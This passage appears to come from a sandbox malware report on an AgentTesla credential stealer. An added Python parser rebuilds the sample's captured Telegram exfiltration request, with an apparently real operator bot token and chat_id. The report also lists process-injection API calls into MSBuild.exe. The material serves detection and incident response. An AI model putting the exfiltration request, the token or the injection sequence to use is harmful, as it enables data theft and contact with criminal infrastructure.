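The request above carries everything a responder needs to identify the operator's channel: the bot token in the URL path, the chat_id in the first form field, and the name of the exfiltrated file in the document part; the session table attributes the connection to the .NET Framework's MSBuild.exe, the process the sample injected into. The Python below is an added example, not code from the report or from the sample: it rebuilds the captured POST from the values shown here (the HTML payload inside the document part is constructed and the helper names are ours), then parses the request line and the multipart body into those indicators. Because the sandbox prints only the beginning of the body (the caption stops at "OSFull"), the parser also copes with a capture that ends before the closing delimiter and flags it as truncated instead of silently dropping the last field.

```python
"""Pull the operator-side indicators (bot token, chat_id, exfiltrated file
name) out of a captured AgentTesla Telegram upload.

Added example; not code from the Joe Sandbox report or from the sample. The
request is rebuilt from the values the report shows (request line, boundary,
Host, chat_id, caption text and document file name from the JSON reply); the
HTML payload, the helper names and the truncation point are ours.
"""
import re
from dataclasses import dataclass, field
from typing import Dict

REQUEST_LINE_RE = re.compile(
    rb"^(?P<verb>[A-Z]+) /bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>\w+) HTTP/1\.[01]\r\n")
BOUNDARY_RE = re.compile(rb'boundary=("?)(?P<b>[^";\r\n]+)\1')
HOST_RE = re.compile(rb"\r\nHost:[ \t]*([^\r\n]+)")
DISPOSITION_RE = re.compile(rb'name="(?P<name>[^"]*)"(?:; filename="(?P<filename>[^"]*)")?')


@dataclass
class TelegramExfil:
    host: str
    method: str
    token: str                      # "<bot id>:<secret>", the operator's credential
    fields: Dict[str, bytes] = field(default_factory=dict)   # form field -> value
    files: Dict[str, str] = field(default_factory=dict)      # form field -> filename
    truncated: bool = False         # capture stopped before the closing delimiter

    @property
    def bot_id(self) -> str:
        return self.token.split(":", 1)[0]

    @property
    def chat_id(self) -> str:
        return self.fields.get("chat_id", b"").decode("ascii", "replace")


def parse_telegram_exfil(raw: bytes) -> TelegramExfil:
    """Parse one HTTP request (headers + multipart body) sent to the Bot API."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = REQUEST_LINE_RE.match(head)
    if not m:
        raise ValueError("not a Telegram bot API request")
    bm = BOUNDARY_RE.search(head)
    if not bm:
        raise ValueError("no multipart boundary in Content-Type")
    hm = HOST_RE.search(head)
    result = TelegramExfil(host=(hm.group(1) if hm else b"").decode("ascii", "replace"),
                           method=m["method"].decode("ascii"),
                           token=m["token"].decode("ascii"))
    # Parts are separated by "--<boundary>"; a complete body ends with "--<boundary>--".
    parts = body.split(b"--" + bm["b"])[1:]          # drop the preamble
    closed = bool(parts) and parts[-1].startswith(b"--")
    if closed:
        parts.pop()
    result.truncated = not closed
    for part in parts:
        headers, _, value = part.partition(b"\r\n\r\n")
        dm = DISPOSITION_RE.search(headers)
        if not dm:
            continue
        name = dm["name"].decode("ascii", "replace")
        if value.endswith(b"\r\n"):              # CRLF that precedes the next delimiter
            value = value[:-2]                   # (absent when the capture was cut short)
        result.fields[name] = value
        if dm["filename"]:
            result.files[name] = dm["filename"].decode("utf-8", "replace")
    return result


# Values taken from the report; the document body below is constructed.
BOUNDARY = b"---------------------------8da2ddf8401560c"
CAPTION = (b"New PW Recovered!\n\nUser Name: user/061544\nOSFullName: Microsoft Windows 10 Pro\n"
           b"CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB")
DOCUMENT_NAME = b"user-061544 2022-05-04 03-05-05.html"


def build_captured_request(complete: bool = True) -> bytes:
    """Constructed sample of the report's POST. complete=False cuts the body
    after 'OSFull', which is where the sandbox's printed capture stops."""
    d = b"--" + BOUNDARY
    body = (b"\r\n" + d + b"\r\nContent-Disposition: form-data; name=\"chat_id\"\r\n\r\n1131810225\r\n"
            + d + b"\r\nContent-Disposition: form-data; name=\"caption\"\r\n\r\n" + CAPTION + b"\r\n"
            + d + b"\r\nContent-Disposition: form-data; name=\"document\"; filename=\"" + DOCUMENT_NAME
            + b"\"\r\nContent-Type: text/html\r\n\r\n<html><body>constructed payload</body></html>\r\n"
            + d + b"--\r\n")
    head = (b"POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1\r\n"
            b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
            b"Host: api.telegram.org\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Expect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n")
    if not complete:
        body = body[: body.index(b"OSFullName") + len(b"OSFull")]
    return head + body


if __name__ == "__main__":
    for complete in (True, False):
        x = parse_telegram_exfil(build_captured_request(complete))
        print(x.host, x.method, x.bot_id, x.chat_id, x.files, "truncated" if x.truncated else "complete")
```

The token is the operator's credential and, with the chat_id, the value to pivot on across other AgentTesla samples and to include in an abuse report to Telegram; it is not something to call the Bot API with yourself. On the detection side the useful pairing is the one the session table gives: an outbound TLS session to api.telegram.org from a process such as MSBuild.exe that has no business talking to a messaging API.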
                                                                                                                                      Target ID:0
                                                                                                                                      Start time:14:37:19
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                                                                                                                                      Imagebase:0xee0000
                                                                                                                                      File size:689664 bytes
                                                                                                                                      MD5 hash:5D5F37A7CF3A9FF4277B3A9DC2C4B9D2
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:14:37:44
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      Imagebase:0xa50000
                                                                                                                                      File size:261728 bytes
                                                                                                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high

Target ID: 14
Start time: 14:38:06
Start date: 04/05/2022
Path: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
Imagebase: 0x550000
File size: 261728 bytes
MD5 hash: D621FD77BD585874F9686D3A76462EF1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 0%, Virustotal
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: high

Target ID: 15
Start time: 14:38:07
Start date: 04/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 16
Start time: 14:38:15
Start date: 04/05/2022
Path: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
Imagebase: 0x600000
File size: 261728 bytes
MD5 hash: D621FD77BD585874F9686D3A76462EF1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 17
Start time: 14:38:16
Start date: 04/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high


Execution Graph

Execution Coverage: 12.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 115
Total number of Limit Nodes: 10

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 0325B8F0
• GetCurrentThread.KERNEL32 ref: 0325B92D
• GetCurrentProcess.KERNEL32 ref: 0325B96A
• GetCurrentThreadId.KERNEL32 ref: 0325B9C3
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 543444b51dd64ae458a86e9df86bbd703f349d968e2e9f6fb0892f54beb15b85
• Instruction ID: 0cf0581c6dc5547eae6e6f16cf73c62e0bbc662f0ec99f35af482d149d0bfed5
• Opcode Fuzzy Hash: 543444b51dd64ae458a86e9df86bbd703f349d968e2e9f6fb0892f54beb15b85
• Instruction Fuzzy Hash: BB5132B09046498FDB10DFAAD988BDEFBF0AF49314F24845AE419A7250C7746988CF65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 0325B8F0
• GetCurrentThread.KERNEL32 ref: 0325B92D
• GetCurrentProcess.KERNEL32 ref: 0325B96A
• GetCurrentThreadId.KERNEL32 ref: 0325B9C3
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: aaca75420acd80ffc2bfcf43bb5a6a6519a5b66be124b5f3a86b038f27372672
• Instruction ID: 0b85624d1e6e8868910f89cb504995ef41c88d4e5e397310a535ff1e078d8eaf
• Opcode Fuzzy Hash: aaca75420acd80ffc2bfcf43bb5a6a6519a5b66be124b5f3a86b038f27372672
• Instruction Fuzzy Hash: 2D5121B09006498FDB50DFAAD588BEEFBF0AF88314F24845AE419B7350D7746988CF65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07CA8546
Memory Dump Source
• Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 422b56a687c8985c723cb1e2094b88aa3851347f05ab3882f52c702b24758076
• Instruction ID: 18749ca89971983b1e374c3acbf90cc9a3b1b5b71280b2133232e7e5e3b2b88e
• Opcode Fuzzy Hash: 422b56a687c8985c723cb1e2094b88aa3851347f05ab3882f52c702b24758076
• Instruction Fuzzy Hash: 48914AB1D0065ADFEF21CF64C8817DEBBF2BB48319F0485A9D809A7240DB749A85CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 032597EE
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 7b30e38de2b6d66bc154eabc19c1ac29d014ca741b9018caaa7f7b6067d39b79
• Instruction ID: a8749e345ab6ca05b387284a4bfc87cfa426694d89f46c4c66c4a0aab3ece2dd
• Opcode Fuzzy Hash: 7b30e38de2b6d66bc154eabc19c1ac29d014ca741b9018caaa7f7b6067d39b79
• Instruction Fuzzy Hash: 64712570A10B058FDB24DF29D04475AB7F5FF88204F048A2DE946DBA40DB75E989CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 03255421
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 0d3ecf53159963cce4addc42b76bd09d601b882509392064ceb621fa89621393
• Instruction ID: 001d8f446d62158cd1de2d9d7bd0ff89c65489479261d6ec599d3cdbd65b5507
• Opcode Fuzzy Hash: 0d3ecf53159963cce4addc42b76bd09d601b882509392064ceb621fa89621393
• Instruction Fuzzy Hash: 7241F070C00219CEDB24CFA9C884BCDBBB1FF89305F258169D419AB251DB796A86CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 170 32538a8-3255431 CreateActCtxA 173 3255433-3255439 170->173 174 325543a-3255494 170->174 173->174 181 3255496-3255499 174->181 182 32554a3-32554a7 174->182 181->182 183 32554a9-32554b5 182->183 184 32554b8 182->184 183->184 186 32554b9 184->186 186->186
APIs
• CreateActCtxA.KERNEL32(?), ref: 03255421
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 0b7b380ed21102bbe551103886d41d44d6cb754a149a6cc093bee9d17c363c5d
• Instruction ID: 970952147c48a212712ef1f66f41eeceffb7dd522487df99d5b92398210db956
• Opcode Fuzzy Hash: 0b7b380ed21102bbe551103886d41d44d6cb754a149a6cc093bee9d17c363c5d
• Instruction Fuzzy Hash: 61410370C1021DCADF20CFA9C88478DBBB1BF49304F218059E409AB251DB756985CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 187 7ca7ff8-7ca8046 189 7ca8048-7ca8054 187->189 190 7ca8056-7ca8095 WriteProcessMemory 187->190 189->190 192 7ca809e-7ca80ce 190->192 193 7ca8097-7ca809d 190->193 193->192
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07CA8088
Memory Dump Source
• Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 2533061cb5b75a3437f0673b7d0496e074e2a4b972850a43a8d9be07cd87a07d
• Instruction ID: 65de888e314fd7c32f29c50fcb17e328a30af97a2ad33f74abb6af9e2df04975
• Opcode Fuzzy Hash: 2533061cb5b75a3437f0673b7d0496e074e2a4b972850a43a8d9be07cd87a07d
• Instruction Fuzzy Hash: 9B2126B19003599FCF10CFA9C8847DEBBF5FF48314F448429E918A7240D7799944CBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 197 325bab0-325bab5 198 325bab8-325bb4c DuplicateHandle 197->198 199 325bb55-325bb72 198->199 200 325bb4e-325bb54 198->200 200->199
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0325BB3F
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: c46c90ff372881191f263fa5b89a289ab9dfee21dd0826c44f2af7214645f65a
• Instruction ID: db5c92f4d01daf25d05ea4a1b69038b0a46f1f7b76f61504a35e68513b33fd83
• Opcode Fuzzy Hash: c46c90ff372881191f263fa5b89a289ab9dfee21dd0826c44f2af7214645f65a
• Instruction Fuzzy Hash: E521E3B5900249AFDB10CF99D884ADEFBF8FB48320F15841AE914B7350D375AA54CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 203 7ca7d70-7ca7dbb 205 7ca7dcb-7ca7dfb SetThreadContext 203->205 206 7ca7dbd-7ca7dc9 203->206 208 7ca7dfd-7ca7e03 205->208 209 7ca7e04-7ca7e34 205->209 206->205 208->209
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 07CA7DEE
Memory Dump Source
• Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: 53c417055cd953c7b35b8733a5da706bf2e07264fd938d6e040b17c2dda44a4b
• Instruction ID: 7dfd9c1d4fe4dc700006228d54958e47f7165b3032f27cf8d33299f3baa5a1df
• Opcode Fuzzy Hash: 53c417055cd953c7b35b8733a5da706bf2e07264fd938d6e040b17c2dda44a4b
• Instruction Fuzzy Hash: 6D2138B1D003499FCB10CFAAC4847EEBBF4AF48328F148429D519A7240DB78AA45CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 213 7ca8118-7ca81a5 ReadProcessMemory 216 7ca81ae-7ca81de 213->216 217 7ca81a7-7ca81ad 213->217 217->216
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07CA8198
Memory Dump Source
• Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 8e2d642d367051c7c733eac1583dfa14725a5201a39f9ca0fd4825c747b80244
• Instruction ID: 17d6c60206c631fe5279d98ef34fb41c7eb354e877fefff1a8bee9c12c3627ba
• Opcode Fuzzy Hash: 8e2d642d367051c7c733eac1583dfa14725a5201a39f9ca0fd4825c747b80244
• Instruction Fuzzy Hash: 1E2128B19003599FCF00DFA9C884ADEFBF5FF48314F518429E618A7240D7799944DBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 221 325bab8-325bb4c DuplicateHandle 222 325bb55-325bb72 221->222 223 325bb4e-325bb54 221->223 223->222
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0325BB3F
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: bd9859f1bf4a56ebabfb32809e88825f9c0fac167236fe3849973e82312f80bd
• Instruction ID: e4dcf33e2f79b777648c6f0eff05c4ba388e0b42b37f8efb7a071c7470ff62ed
• Opcode Fuzzy Hash: bd9859f1bf4a56ebabfb32809e88825f9c0fac167236fe3849973e82312f80bd
• Instruction Fuzzy Hash: 7421C2B59002499FDB10CFA9D884ADEFBF8FB48324F14841AE914A7350D375AA54CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 226 3259a08-3259a50 227 3259a52-3259a55 226->227 228 3259a58-3259a87 LoadLibraryExW 226->228 227->228 229 3259a90-3259aad 228->229 230 3259a89-3259a8f 228->230 230->229
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03259869,00000800,00000000,00000000), ref: 03259A7A
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: dfc92cafb3dd4345c8a312263c0938ded779ac2662d411fe58da11868a17321a
• Instruction ID: 25b3c6aef1dd893d48361c5c1aca753619f6e7498b77da574ee100b1879fafdc
• Opcode Fuzzy Hash: dfc92cafb3dd4345c8a312263c0938ded779ac2662d411fe58da11868a17321a
• Instruction Fuzzy Hash: 6521D6B5D00249DFDB10CFA9D484ADEFBF4EB88314F14852AE919A7200C379A585CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 233 32588d8-3259a50 235 3259a52-3259a55 233->235 236 3259a58-3259a87 LoadLibraryExW 233->236 235->236 237 3259a90-3259aad 236->237 238 3259a89-3259a8f 236->238 238->237
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03259869,00000800,00000000,00000000), ref: 03259A7A
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: a6b480ea462d78953b295921b572bdb29e5fbeaec6b85088b5e766a2e8fcb715
• Instruction ID: 1bf50070648ec83fe5e597bb7e6a71bcf845d3745cc0cb2185ca818318285d88
• Opcode Fuzzy Hash: a6b480ea462d78953b295921b572bdb29e5fbeaec6b85088b5e766a2e8fcb715
• Instruction Fuzzy Hash: 5311D3B6900349DFDB10CF9AC444ADEFBF4AB48314F14842AE919B7200C375A985CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Blocks (graph image not reproduced): 241 = 7ca7f08-7ca7f83 (calls VirtualAllocEx), 244 = 7ca7f8c-7ca7fb1, 245 = 7ca7f85-7ca7f8b; edges: 241->244, 241->245, 245->244
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07CA7F76
Memory Dump Source
• Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 73ec0851c1df262a3786954d7632b9867f0208ae6649b3c834078feddd754f9b
• Instruction ID: 0b0be726daff412948449d84fb9e714a2f63759506fe262c00b0736d126e442c
• Opcode Fuzzy Hash: 73ec0851c1df262a3786954d7632b9867f0208ae6649b3c834078feddd754f9b
• Instruction Fuzzy Hash: 061107B29002499FCF10DFA9C8447DFBBF5AF48324F148819E515A7250C775A954DFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Blocks (graph image not reproduced): 249 = 7ca7c90-7ca7cff (calls ResumeThread), 252 = 7ca7d08-7ca7d2d, 253 = 7ca7d01-7ca7d07; edges: 249->252, 249->253, 253->252
APIs
Memory Dump Source
• Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 72990a959d2c5685a973165c02ed86704e6dd17da26f2e06636c236334e1f8b8
• Instruction ID: 3a51e3d303a3106297e894c0e86a45e8ab93b780f4316a314e479f10ca5e91d4
• Opcode Fuzzy Hash: 72990a959d2c5685a973165c02ed86704e6dd17da26f2e06636c236334e1f8b8
• Instruction Fuzzy Hash: E3113AB1D003498BCB10DFAAC4447DEFBF4AF88328F148829D515B7240CB75A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 032597EE
Memory Dump Source
• Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 0922413da707b5721a4aa83a5b6a79f85b5f9f325c51dd415c00dacaf24175da
• Instruction ID: 0d542a9bb7ce87c4fd5db86aaba436dbbd2b4a91fcf00a6730d5c8ee65df5339
• Opcode Fuzzy Hash: 0922413da707b5721a4aa83a5b6a79f85b5f9f325c51dd415c00dacaf24175da
• Instruction Fuzzy Hash: F511DFB5D007498FDB10CF9AD444BDEFBF8AB88224F14852AE819A7600D375A685CFA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7afd33ad35d1dd841fbfd7da1638268aa1b243330217a932b5ff669c9a7765e0
